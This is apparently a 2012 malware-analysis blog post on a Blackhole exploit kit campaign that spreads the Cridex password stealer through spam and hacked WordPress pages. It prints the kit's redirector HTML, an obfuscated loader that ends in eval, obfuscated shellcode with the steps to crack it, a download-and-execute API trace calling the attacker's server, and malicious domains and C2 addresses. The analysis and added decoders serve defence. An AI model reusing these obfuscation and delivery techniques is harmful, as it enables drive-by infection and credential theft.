Sunday, December 9, 2012

Spam "You have been sent a file" + WordPress Redirector * BHEK2.x(Plugindetect 0.7.9) + New Shellcode Obfuscation = Cridex Password Stealer

Infection Summary

Spam emails to redirector landing page.
Wordpress hacked page: isoheraly.wordpress.com / 74.200.244.59, 76.74.254.120, 72.233.2.58, 76.74.254.123, 74.200.243.251, 72.233.69.6
Landing page redirect: visionuvce.in / 173.254.28.115
PluginDetect/BHEK: pelamutrika.ru / 202.180.221.186
CNC/Proxy: 180.235.150.72:8080, 203.113.98.131:80, 173.224.221.135:8080, 206.176.226.157:8080, 132.248.49.112, 113.130.65.77
Here's the garbage:
column.php     2a80f7345c390d1b07a51eb3d2d47c65 (9/46)  = PluginDetect 0.7.9 (Obfs)
contacts.exe   a8ccedc5fe10ea98cb84a8ad20901d8e (25/46) = Trojan/Downloader
exp2.tmp.exe   dde1d5cfed7d5646239aed75c0cd0add (3/46)  = Trojan/PWDStealer/Backdoor
field.swf      cee585aab7e27d917f57cb6ecadf39d4 (22/46) = Flash EXP CVE-2011-0611
infector1.pdf  6ae849734bca6275978ae5026c00b9a6 (18/46) = PDF EXP CVE-2009-0927 CVE-2008-2992 CVE-2007-5659 CVE-2009-4324
infector2.pdf  fad56fcb294197a25dad3e05beba3fcf (2/46)  = PDF EXP CVE-2010-0188
redirect.htm   791f2fde75e66b41d862096138f3f70a (17/46) = Landingpage HTML redirector
score.swf      8ee6d435e5bb423671bd03728745bd0b (17/46) = swf EXP CVE-2012-0769
spn.jar        544ba62e8d94c2a6d4a9c9e4de923f09 (8/45)  = jar EXP CVE-2012-5076
spn2.jar       33fefa4d50e3d6f4db773ffec1d4645a (6/46)  = jar EXP CVE-2012-4681 & CVE-2012-1723
spn3.jar       3ae32c5c9d390a99132d97745cb7ac29 (8/46)  = jar EXP CVE-2012-0507 & CVE-2012-4681
t.pdf          d1e2ff36a6c882b289d3b736d915a6cc (23/43) = PDF EXP CVE-2009-2990
*) The figures in parentheses are the VirusTotal detection ratios for each MD5.

Source of Infection

This time we would like to report an infection by a trojan password stealer whose campaign is using the URL below:
h00p://visionuvce.in/redirect.htm
The campaign is ongoing under two patterns. One pattern is via spam email: you may be aware of the emails with the subject "You have been sent a file (Filename: Gohe-43.pdf)" or "Sendspace File Delivery Notification". Not only spam, but also a hacked WordPress page like the URL below: (WARNING, THE PAGE ABOVE IS UP AND ALIVE...) We checked the source of the infector link:
--18:17:50--  h00p://visionuvce.in/redirect.htm
           => `redirect.htm'
Resolving visionuvce.in... seconds 0.00, 173.254.28.115
Caching visionuvce.in => 173.254.28.115
Connecting to visionuvce.in|173.254.28.115|:80... seconds 0.00, connected.
---request begin---
GET /redirect.htm HTTP/1.0
Referer: http://www.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: visionuvce.in
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Date: Sat, 08 Dec 2012 09:17:50 GMT
Server: Apache
Last-Modified: Fri, 07 Dec 2012 14:38:47 GMT
ETag: "5162339-1a7-4d0442c60507d"
Accept-Ranges: bytes
Content-Length: 423
Cache-Control: max-age=1209600
Expires: Sat, 22 Dec 2012 09:17:50 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=30
Connection: Keep-Alive
Content-Type: text/html
---response end---
200 OK
Registered socket 1896 for persistent reuse.
Length: 423 [text/html]
100%[====================================>] 423           --.--K/s
18:17:51 (13.88 MB/s) - `redirect.htm' saved [423/423]
↑Inside the HTML there is a BHEK2 redirector↓
$ cat redirect.htm

<html>
 <head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
 </head>
 <body>  
<h1><b>Please wait a moment ... You will be forwarded... </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
<script>
var1=49;
var2=var1;
if(var1==var2) 
{document.location="h00p://pelamutrika・ru:8080/forum/links/column.php";}
</script>
</body>
</html>
So this is how our crusade starts..

PluginDetect 0.7.9 with new shellcode obfuscation

Using the right parameter we fetched the column.php...
--18:22:20--  h00p://pelamutrika・ru:8080/forum/links/column.php
           => `column.php'
Resolving pelamutrika・ru... seconds 0.00, 202.180.221.186
Caching pelamutrika・ru => 202.180.221.186
Connecting to pelamutrika・ru|202.180.221.186|:8080... seconds 0.00, connected.
---request begin---
GET /forum/links/column.php HTTP/1.0
Referer: h00p://visionuvce・in/redirect.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: pelamutrika.ru:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Sat, 08 Dec 2012 09:20:14 GMT
Content-Type: text/html; charset=CP-1251
Connection: close
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
---response end---
200 OK
Length: unspecified [text/html]
18:22:28 (21.64 KB/s) - `column.php' saved [102600]
which contains the latest obfuscated PluginDetect 0.7.9 --->>[PASTEBIN]. The structure of the obfuscation is nothing special; it is as I commented below:
//let's ignore the html base tags...
<html><head><title></title></head><body>

// This is the jar infector applet to be directly downloaded, via IE header-
// "User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_23"
//
<applet archive="h00p://pelamutrika.ru:8080/forum/links/column.php?ckh=ldrxik&xnfinc=wyzs" code="hw">
<param name="prime" value="V0Kyl8qVwlKOrfrfj.tlK0j-8oqij%t-K0ow3D3xS.b1fO6oO68O68O11RFebhvO6qO60O1hO11O6qO6qO16O6CO6tRUb6.R-qbDRS.b8" />
<param name="val" value="Dyy3Ojj3e-"/></applet>

<div></div>

// First scattered evil script...
<script>gg="getA"+"ttri";qq="q";asd=function(){r=a[gg+"bute"](i);};p="p"+"a";</script>

// Hiding the array of obfuscation data in var q(0 to 32)in DIV tag....
<div id="q" 
  0=";08f70;28725;85k7m;58d7c;57g7q;84n78;....
  1=
  2
  :
  :
 32=";72n30;6292h;47q83;78383;78949;02930;...
</div>

//The deobfuscator generator...
<script>
  if(document.getElementsByTagName("div").length>0)
   {
   a=document.getElementById(qq);
   s="";
   for(i=0;;i++){
     asd();
     if(r){s=s+r;}else break;
                }
   a=zxv=s;
   s=hwebewg="";
   p=parseInt;
   for(i=0;i<a.length;i+=2){
      if(a["substr"](i,1)==";")continue;
      if(document.getElementsByTagName("div").length>0)s+=String["fromCharCode"]((p(a.substr(i,2),27)+5)/2);
   }
c=s;
if(window.document){e=eval("eval");
if(document.getElementsByTagName("div")[0].style.left==="")e(c);
   }}
</script>
</body></html>
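The data layer of the script above (the numbered attributes on the div, decoded two characters at a time as base-27 digits) can be undone without a browser and without ever reaching the eval(). The following is an added example written for this post, not code from the kit or from the original article: the decoder is the same arithmetic as the page's loop, while the encoder is an assumed inverse built only to produce test data (the kit's own encoder is not on the page). The string PAGE_FRAGMENT is the visible start of attribute 0 as shown above; SAMPLE_ATTRS is constructed.

```javascript
// Added example, not part of the original post: a stand-alone re-implementation
// of the decoding step that the column.php script performs on the <div id="q">
// attributes, without the DOM and without the eval() at the end.

// Same arithmetic as the page's loop: read two characters at a time, skip the
// ";X" junk pairs, parse the pair as base-27 and map (n + 5) / 2 to a char code.
function decodeDivPayload(attrValues) {
  const joined = attrValues.join("");            // the page concatenates attributes 0..32
  let out = "";
  for (let i = 0; i < joined.length; i += 2) {
    if (joined.substr(i, 1) === ";") continue;   // ";" plus one junk character
    out += String.fromCharCode((parseInt(joined.substr(i, 2), 27) + 5) / 2);
  }
  return out;
}

// Assumed inverse transform, constructed here only to build test data (the kit's
// encoder is not on the page): char code c -> 2c - 5, written as two base-27
// digits, with a ";X" junk pair inserted after every third character.
const BASE27 = "0123456789abcdefghijklmnopq";
function encodeDivPayload(text, attrWidth) {
  let s = "";
  for (let k = 0; k < text.length; k++) {
    const n = 2 * text.charCodeAt(k) - 5;
    if (n < 0 || n >= 27 * 27) throw new Error("character not encodable: " + text[k]);
    s += BASE27[Math.floor(n / 27)] + BASE27[n % 27];
    if ((k + 1) % 3 === 0) s += ";" + BASE27[k % 10];
  }
  // Chop into fixed-width pieces, mimicking the numbered attributes on the div.
  const attrs = [];
  for (let i = 0; i < s.length; i += attrWidth) attrs.push(s.slice(i, i + attrWidth));
  return attrs;
}

// The visible start of attribute 0 exactly as the page shows it (the rest of
// the attribute is elided in the post).
const PAGE_FRAGMENT = ";08f70;28725;85k7m;58d7c;57g7q;84n78";

// Constructed round-trip input, so the decoder can be checked offline.
const SAMPLE_ATTRS = encodeDivPayload("var PluginDetect = {};", 10);

function demoDivDecode() {
  return {
    fromPage: decodeDivPayload([PAGE_FRAGMENT]),   // "var PluginDe"
    roundTrip: decodeDivPayload(SAMPLE_ATTRS),     // "var PluginDetect = {};"
  };
}

console.log(demoDivDecode());
```

Two things worth noting for triage: the junk separators only work because every pair boundary sits at an even index, so a decoder that tokenises on ";" instead of stepping by two will desynchronise; and the page's script gates its eval() on a DOM property check (`style.left===""`), which is why a decoder like this one, which stops at the decoded text and never evaluates it, is the safer way to look at what the data contains.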
By using the previous post's guidance on how to crack this obfuscation you can get the original infector code with PluginDetect 0.7.9, as I pasted here --->>[PASTEBIN]

What's the difference of this BHEK2 Infection?

The difference is in the shellcode and the payload. Other differences are minor and not significant enough to be reported in this blog. The CVE exploits used in the components (jar, pdf & swf) are also the same as before, meaning the files below are the same as in the previous week's report: spn.jar, spn2.jar, spn3.jar, t.pdf, infector1.pdf, infector2.pdf, score.swf

The Shellcode

The shellcode itself is obfuscated in a new way that automation tools can't crack automatically (yet); it is in the function below:
function getShellCode(){
  var a = "
8282!%5114!%15e4!%04e0!%3451!%e044!..
2191!%b1b1!%a121!%21b1!%9154!%3421!..
2191!%b181!%e451!%7115!%0485!%6085!..
8170!%8101!%2101!%a5d5!%9460!%1434!..
15e1!%eee6!%3733!%2e2a!%59b1!%7492!..
8224!%ce24!%82d5!%8a71!%2df6!%82d5!..
c224!%7de7!%82b7!%e324!%8ed5!%c3da!..
2a9e!%8217!%5312!%eec6!%4444!%60c4!..
7de7!%8282!%0d82!%b704!%b580!%8050!..
42fe!%47c0!%825a!%9282!%4cc2!%a59a!..
d5a5!%8204!%6482!%0474!%7dbc!%bed2!..
8724!%8207!%8282!%0c82!%ac1d!%7d7d!..
8a55!%0480!%583a!%3cb7!%17be!%3867!..
e43a!%b25f!%67c0!%673a!%d5ec!%3173!..
58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!..
c0da!%fac1!%d53d!%11e2!%bee6!%8681!..
e502!%e73a!%8543!%423a!%3a86!%8681!..
042e!%0382!%ef08!%9ea0!%6618!%139c!..
  ".split("").reverse().join("");
  return a["replace"](/\%!/g, "%" + "u")
}
The split, reverse and join followed by replacing "%!" with "%u" seem to confuse Wepawet and jsunpack, so they don't produce the correct result. You can use my trick and write JS code like the below to crack it:
var x="";
var a = "8282!%5114!%15e4!%04e0!%3451!%e044!%9134!%2551!%74e..
492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8..
%f4b5!%a5d4!%c2c0!%42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!..
a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f7..
414!%1414!%".split("").reverse().join("");
x=a["replace"](/\%!/g, "%" + "u");
eval(x);
And what reaches eval() is the correct shellcode, as below:
%u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u0ae9%u80fe%u2..
13%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%..
4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407..
%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1..
This format can be cracked well by some automation tools, or you can do it manually as I do, by deleting the "%u" and extracting it into binary, like the snapshot below (it is hex-encoded code, harmless in this form):
41 41 41 41 66 83 e4 fc  fc eb 1O 58 31 c9 66 81  AAAAf......X1.f. 
e9 Oa fe 8O 3O 28 4O e2  fa eb O5 e8 eb ff ff ff  ....O(@......... 
ad cc 5d 1c c1 77 1b e8  4c a3 68 18 a3 68 24 a3  ..]..w..L.h..h$. 
58 34 7e a3 5e 2O 1b f3  4e a3 76 14 2b 5c 1b O4  X4~.^...N.v.+\.. 
a9 c6 3d 38 d7 d7 9O a3  68 18 eb 6e 11 2e 5d d3  ..=8....h..n..]. 
af 1c Oc ad cc 5d 79 c1  c3 64 79 7e a3 5d 14 a3  .....]y..dy~.].. 
5c 1d 5O 2b dd 7e a3 5e  O8 2b dd 1b e1 61 69 d4  \.P+.~.^.+...ai. 
85 2b ed 1b f3 27 96 38  1O da 5c 2O e9 e3 25 2b  .+...'.8..\...%+ 
f2 68 c3 d9 13 37 5d ce  76 a3 76 Oc 2b f5 4e a3  .h...7].v.v.+.N. 
24 63 a5 6e c4 d7 7c Oc  24 a3 fO 2b f5 a3 2c a3  $c.n..|.$..+..,. 
2b ed 83 76 71 eb c3 7b  85 a3 4O O8 a8 55 24 1b  +..vq..{..@..U$. 
5c 2b be c3 db a3 4O 2O  a3 df 42 2d 71 cO bO d7  \+....@...B-q... 
d7 d7 ca d1 cO 28 28 28  28 7O 78 42 68 4O d7 28  .....((((pxBh@.( 
28 28 78 ab e8 31 78 7d  a3 c4 a3 76 38 ab eb 2d  ((x..1x}...v8..- 
d7 cb 4O 47 46 28 28 4O  5d 5a 44 45 7c d7 3e ab  ..@GF((@]ZDE|.>. 
ec 2O a3 cO cO 49 d7 d7  d7 c3 2a c3 5a a9 c4 2c  .....I....*.Z.., 
29 28 28 a5 74 Oc 24 ef  2c Oc 5a 4d 4f 5b ef 6c  )((.t.$.,.ZMO[.l 
Oc 2c 5e 5a 1b 1a ef 6c  Oc 2O O8 O5 5b O8 7b 4O  .,^Z...l....[.{@ 
dO 28 28 28 d7 7e 24 a3  cO 1b e1 79 ef 6c 35 28  .(((.~$....y.l5( 
5f 58 4a 5c ef 6c 35 2d  O6 4c 44 44 ee 6c 35 21  _XJ\.l5-.LDD.l5! 
28 71 a2 e9 2c 18 aO 6c  35 2c 69 79 42 28 42 28  (q..,..l5,iyB(B( 
7b 7f 42 28 d7 7e 3c ad  e8 5d 3e 42 28 7b d7 7e  {.B(.~<..]>B({.~ 
2c 42 28 ab c3 24 7b d7  7e 2c ab eb 24 c3 2a c3  ,B(..${.~,..$.*. 
3b 6f a8 17 28 5d d2 6f  a8 17 28 5d ec 42 28 42  ;o..(].o..(].B(B 
d6 d7 7e 2O cO b4 d6 d7  d7 a6 66 26 c4 bO d6 a2  ..~.......f&.... 
26 a1 47 29 95 1b e2 a2  73 33 ee 6e 51 1e 32 O7  &.G)....s3.nQ.2. 
58 4O 5c 5c 58 12 O7 O7  58 4d 44 49 45 5d 5c 5a  X@\\X...XMDIE]\Z 
41 43 49 O6 5a 5d 12 1O  18 1O 18 O7 4e 47 5a 5d  ACI.Z]......NGZ] 
45 O7 44 41 46 43 5b O7  4b 47 44 5d 45 46 O6 58  E.DAFC[.KGD]EF.X 
4O 58 17 51 4e 15 1b 18  12 19 46 12 19 41 12 19  @X.QN.....F..A.. 
41 12 1b 1b Oe 59 4d 15  1a 5e 12 19 43 12 19 45  A....YM..^..C..E 
12 1b 1a 12 1b 1b 12 19  43 12 19 43 12 1b 19 12  ........C..C.... 
19 42 12 19 47 Oe 52 15  19 43 Oe 44 43 15 4O Oe  .B..G.R..C.DC.@. 
51 4e 15 41 28 28                                 QN.A(( 
This means the API operations use kernel32.dll & urlmon.dll to download, save, run & register the malware on your PC:
0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\]) 
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://pelamutrika・ru:8080/forum/links/column.php?yf=30:1n:1i:1i:33&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&z=1k&lk=h&yf=i, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
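The three manual steps above (undo the reverse and the "%!" marker, strip the "%u" escapes into bytes, look at the bytes as a hex dump) are mechanical enough to script. The block below is an added example for this post, not code from the kit, from the original article or from any of the tools it names. The only input it uses is constructed: the first six %u words of the decoded shellcode shown on the page, put back into the obfuscated form that getShellCode() would hold for that prefix.

```javascript
// Added example, not part of the original post: the three steps the post does
// by hand on the getShellCode() output, as plain functions.

// Step 1: undo the reverse() and turn the "%!" marker back into "%u".
function unwrapShellcode(obfuscated) {
  return obfuscated.split("").reverse().join("").replace(/%!/g, "%u");
}

// Step 2: "%uXXXX" is a 16-bit unit stored little-endian, so %u8366 becomes
// the bytes 66 83 (compare the page's dump: 41 41 41 41 66 83 e4 fc ...).
// Anything that is not a well-formed %u escape is reported, not skipped.
function unicodeEscapesToBytes(s) {
  const bytes = [];
  const re = /%u([0-9a-fA-F]{4})/g;
  let consumed = 0;
  let m;
  while ((m = re.exec(s)) !== null) {
    if (m.index !== consumed) throw new Error("non-%u data at offset " + consumed);
    const word = parseInt(m[1], 16);
    bytes.push(word & 0xff, word >>> 8);
    consumed = m.index + m[0].length;
  }
  if (consumed !== s.length) throw new Error("trailing data at offset " + consumed);
  return bytes;
}

// Step 3: render the bytes like the post's snapshot (hex column + printable ASCII).
function hexDump(bytes, width) {
  width = width || 16;
  const lines = [];
  for (let off = 0; off < bytes.length; off += width) {
    const row = bytes.slice(off, off + width);
    const hex = row.map(b => b.toString(16).padStart(2, "0")).join(" ");
    const ascii = row.map(b => (b >= 0x20 && b < 0x7f) ? String.fromCharCode(b) : ".").join("");
    lines.push(hex + "  " + ascii);
  }
  return lines;
}

// Constructed sample: "%u4141%u4141%u8366%ufce4%uebfc%u5810" (the first six
// words of the page's decoded shellcode) after the kit's "%u" -> "%!" swap and
// string reversal, i.e. what getShellCode() would contain for that prefix.
const OBFUSCATED_PREFIX = "0185!%cfbe!%4ecf!%6638!%1414!%1414!%";

function demoShellcodeUnwrap() {
  const unwrapped = unwrapShellcode(OBFUSCATED_PREFIX);
  const bytes = unicodeEscapesToBytes(unwrapped);
  return { unwrapped, bytes, dump: hexDump(bytes) };
}

console.log(demoShellcodeUnwrap());
```

The first dump line this produces, "41 41 41 41 66 83 e4 fc fc eb 10 58  AAAAf......X", matches the opening of the snapshot above, which is the check that the little-endian byte order in step 2 is right. For detection purposes the interesting artefact is the "%!" marker itself: a legitimate page has no reason to carry a long string of four-hex-digit groups separated by "%!" that is only ever read through reverse() and a replace().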

The Payload

In the shellcode, the payload download URL is shown as below:
h00p://pelamutrika・ru:8080/forum/links/column.php?yf=30:1n:1i:1i:33&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&z=1k&lk=h&yf=i
I fetched it like this:
--13:34:29--  h00p://pelamutrika.ru:8080/forum/links/column.php?yf=30:1n:1i:1i:33&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&z=1k&lk=h&yf=i
           => `column.php@yf=30%3A1n%3A1i%3A1i%3A33&qe=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&z=1k&lk=h&yf=i'
Resolving pelamutrika.ru... seconds 0.00, 202.180.221.186
Caching pelamutrika.ru => 202.180.221.186
Connecting to pelamutrika.ru|202.180.221.186|:8080... seconds 0.00, connected.
Created socket 1896.
Releasing 0x003d5768 (new refcount 1).
---request begin---
GET /forum/links/column.php?yf=30:1n:1i:1i:33&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&z=1k&lk=h&yf=i HTTP/1.0
Referer: h00p://pelamutrika.ru:8080/forum/links/column.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: pelamutrika.ru:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Sun, 09 Dec 2012 04:32:22 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Pragma: public
Expires: Sun, 09 Dec 2012 04:33:15 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="contacts.exe"
Content-Transfer-Encoding: binary
Content-Length: 121344
---response end---
200 OK
Registered socket 1896 for persistent reuse.
Length: 121,344 (119K) [application/x-msdownload]
100%[====================================>] 121,344       54.23K/s
13:34:33 (54.12 KB/s) - `column.php@yf=30%3A1n%3A1i%3A1i%3A33&qe=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&z=1k&lk=h&yf=i' saved [121344/121344]
And there is your payload :-) You can also go through the infector**.pdf files, which have the same shellcode to download the payload; I proved to myself it is the same one.

What does this payload really do?

Let's save the payload under its original name on the server, "contacts.exe". I analyzed the binary as below:
0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00    ................
0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
0080   50 45 00 00 4C 01 05 00 BF 0F C2 50 00 00 00 00    PE..L......P....
0090   00 00 00 00 E0 00 0F 01 0B 01 02 32 00 46 00 00    ...........2.F..
00A0   00 94 01 00 00 00 00 00 00 10 00 00 00 10 00 00    ................
00B0   00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00    .p....@.........
 :                            :                                  :
MD5:  a8ccedc5fe10ea98cb84a8ad20901d8e
Size:  118.5 KB ( 121344 bytes ) 
block   0x40
type    EXEC (Executable file)
os      windows
arch    i386
bits    32
endian  little

Valid PE file
Entry Point: 0x1000
Sections:
   .code 0x1000 0x2312 9216 <=== EP
   .text 0x4000 0x219a 8704
   .rdata 0x7000 0xc0 512
   .data 0x8000 0xa8c 2048
   
Compile Time: 0x50C20FBF [Fri Dec 07 15:48:15 2012 UTC]
Compiler Trace: MS Visual C++
CRC Failed. Claimed:  0, Actual:  153281
Invalid Import data at RVA: 0x8244  // Crypter?
the RVA is invalid: 0x2e2e9020  // Crypter?
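The entry point, compile time and section count in the tool output above are all plain header fields, and the first 0xC0 bytes shown in the hex dump are enough to read them. The block below is an added example written for this post, not the tool the author used and not code from the original article; the only input is the page's own dump, transcribed as hex, so the values it returns can be compared with the lines above.

```javascript
// Added example, not part of the original post: read the fields that the
// analysis output above reports (entry point, compile time, section count)
// straight out of the PE headers. The bytes are the first 0xC0 bytes of
// contacts.exe exactly as the hex dump on the page shows them.
const CONTACTS_EXE_HEAD = Buffer.from(
  "4D5A90000300000004000000FFFF0000" + // 0000: MZ header
  "B8000000000000004000000000000000" + // 0010
  "00000000000000000000000000000000" + // 0020
  "00000000000000000000000080000000" + // 0030: e_lfanew = 0x80
  "0E1FBA0E00B409CD21B8014CCD215468" + // 0040: DOS stub
  "69732070726F6772616D2063616E6E6F" + // 0050
  "742062652072756E20696E20444F5320" + // 0060
  "6D6F64652E0D0D0A2400000000000000" + // 0070
  "504500004C010500BF0FC25000000000" + // 0080: "PE\0\0" then the COFF header
  "00000000E0000F010B01023200460000" + // 0090: optional header magic 0x10B (PE32)
  "00940100000000000010000000100000" + // 00A0: AddressOfEntryPoint = 0x1000
  "00700000000040000010000000020000",  // 00B0: ImageBase = 0x400000
  "hex");

function parsePeHeader(buf) {
  if (buf.readUInt16LE(0) !== 0x5a4d) throw new Error("missing MZ signature");
  const peOffset = buf.readUInt32LE(0x3c);                     // e_lfanew
  if (buf.readUInt32LE(peOffset) !== 0x00004550) throw new Error("missing PE signature");
  const coff = peOffset + 4;                                    // IMAGE_FILE_HEADER
  const opt = coff + 20;                                        // IMAGE_OPTIONAL_HEADER
  const numberOfSections = buf.readUInt16LE(coff + 2);
  const timeDateStamp = buf.readUInt32LE(coff + 4);
  const sizeOfOptionalHeader = buf.readUInt16LE(coff + 16);
  const characteristics = buf.readUInt16LE(coff + 18);
  const sectionTableOffset = opt + sizeOfOptionalHeader;
  return {
    machine: buf.readUInt16LE(coff),                            // 0x14c = i386
    numberOfSections,
    compileTimeUtc: new Date(timeDateStamp * 1000).toISOString(),
    isExecutableImage: (characteristics & 0x0002) !== 0,
    isDll: (characteristics & 0x2000) !== 0,
    pe32Plus: buf.readUInt16LE(opt) === 0x20b,
    entryPoint: buf.readUInt32LE(opt + 16),
    imageBase: buf.readUInt32LE(opt + 28),
    sectionAlignment: buf.readUInt32LE(opt + 32),
    fileAlignment: buf.readUInt32LE(opt + 36),
    // Section headers (40 bytes each) start after the optional header; the
    // dump on the page stops at 0xC0, so for this input they are out of reach.
    sectionTableOffset,
    sectionTableAvailable: sectionTableOffset + 40 * numberOfSections <= buf.length,
  };
}

console.log(parsePeHeader(CONTACTS_EXE_HEAD));
```

Run against the dump, this returns the entry point 0x1000 and the compile time 2012-12-07T15:48:15Z that the tool printed, and it reports that the section table starts at file offset 0x178, past the end of what is shown, which is why the section sizes cannot be re-derived from these bytes. NumberOfSections reads 5 here, one more than the four sections listed above; the .rsrc section that the strings listing further down refers to accounts for the fifth. The optional header CheckSum field (optional header offset 64, file offset 0xD8) is likewise outside the dump, so the "CRC Failed. Claimed: 0" line above cannot be re-checked from this input.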

//Suspicious DLL's Calls
DEP setting change trace:  0x40837c HeapCreate
Anti Debugging traces   :  0x40839c LoadLibraryA
Anti Debugging traces   :  0x4083a0 GetProcAddress
TLS aware call          :  0x408398 TlsAlloc

//Interesting strings: "MopLon66" suggests a crypter series..

File     Mem      Strings..
------------------------------------
0x005E00 0x409A00 MopLon66/
0x005EF0 0x409AF0 MopLon661MopLon66SXPOWOTSXOXWWXWWVRQVVURQSXTRTTOWOVQRPSRWXTWRXXUTPXMopLon66ID
0x01D951 0x421551 ,UMopLon66
Interesting! All DLL calls can be reviewed well, but many functions are encrypted. // We can plainly see the data text..
.rdata:00407004 0000000C C IsAppThemed            
.rdata:00407010 0000000C C uxtheme.dll            
.rdata:0040701C 0000000E C DllGetVersion          
.rdata:0040702C 0000000D C COMCTL32.DLL           
.rdata:0040703C 0000000B C AlphaBlend             
.rdata:00407048 0000000C C msimg32.dll            
.data:0040843E  00000007 C memset                 
.data:00408446  0000000B C MSVCRT.dll             
.data:00408454  00000011 C GetModuleHandleA       
.data:00408468  0000000B C HeapCreate             
.data:00408476  0000000C C HeapDestroy            
.data:00408484  0000000C C ExitProcess            
.data:00408490  0000000D C KERNEL32.dll           
.data:004084A0  00000007 C strlen                 
.data:004084AA  00000007 C strcpy                 
.data:004084B4  00000008 C strncpy                
.data:004084BE  00000007 C strcat                 
.data:004084C8  00000005 C fabs                   
.data:004084D0  00000005 C ceil                   
.data:004084D8  00000007 C malloc                 
.data:004084E2  00000006 C floor                  
.data:004084EA  00000005 C free                   
.data:004084F2  00000007 C fclose                 
.data:004084FC  00000007 C memcpy                 
.data:00408506  00000007 C _CIexp                 
.data:00408510  00000009 C HeapFree               
.data:0040851C  0000000A C HeapAlloc              
.data:00408528  00000014 C GetCurrentProcessId    
.data:0040853E  00000013 C GetCurrentThreadId     
.data:00408554  00000009 C TlsAlloc               
.data:00408560  0000000D C LoadLibraryA           
.data:00408570  0000000F C GetProcAddress         
.data:00408582  0000000C C FreeLibrary            
.data:00408590  0000000E C GetVersionExA          
.data:004085A0  0000000C C HeapReAlloc            
.data:004085AE  00000010 C CallWindowProcA        
.data:004085C0  00000014 C GetForegroundWindow    
.data:004085D6  00000019 C GetWindowThreadProcessI
.data:004085F2  00000010 C IsWindowVisible        
.data:00408604  00000010 C IsWindowEnabled        
.data:00408616  0000000F C GetWindowLongA         
.data:00408628  0000000D C SetWindowPos           
.data:00408638  0000000D C EnableWindow           
.data:00408648  0000000C C EnumWindows            
.data:00408656  0000000C C DestroyIcon            
.data:00408664  00000009 C FillRect               
.data:0040866E  0000000B C USER32.DLL             
.data:0040867C  00000008 C EndPage                
.data:00408686  00000007 C EndDoc                 
.data:00408690  0000000E C GetObjectType          
.data:004086A0  0000000D C DeleteObject           
.data:004086B0  0000000B C GetObjectA             
.data:004086BE  00000013 C CreateCompatibleDC     
.data:004086D4  0000000A C GetDIBits              
.data:004086E0  00000009 C DeleteDC               
.data:004086EC  00000011 C CreateDIBSection       
.data:00408700  0000000D C SelectObject           
.data:00408710  00000007 C BitBlt                 
.data:0040871A  0000000D C CreateBitmap           
.data:0040872A  00000009 C SetPixel               
.data:00408736  0000000F C GetStockObject         
.data:00408746  0000000A C GDI32.DLL              
.data:00408752  00000011 C GetSaveFileNameA       
.data:00408766  00000011 C GetOpenFileNameA       
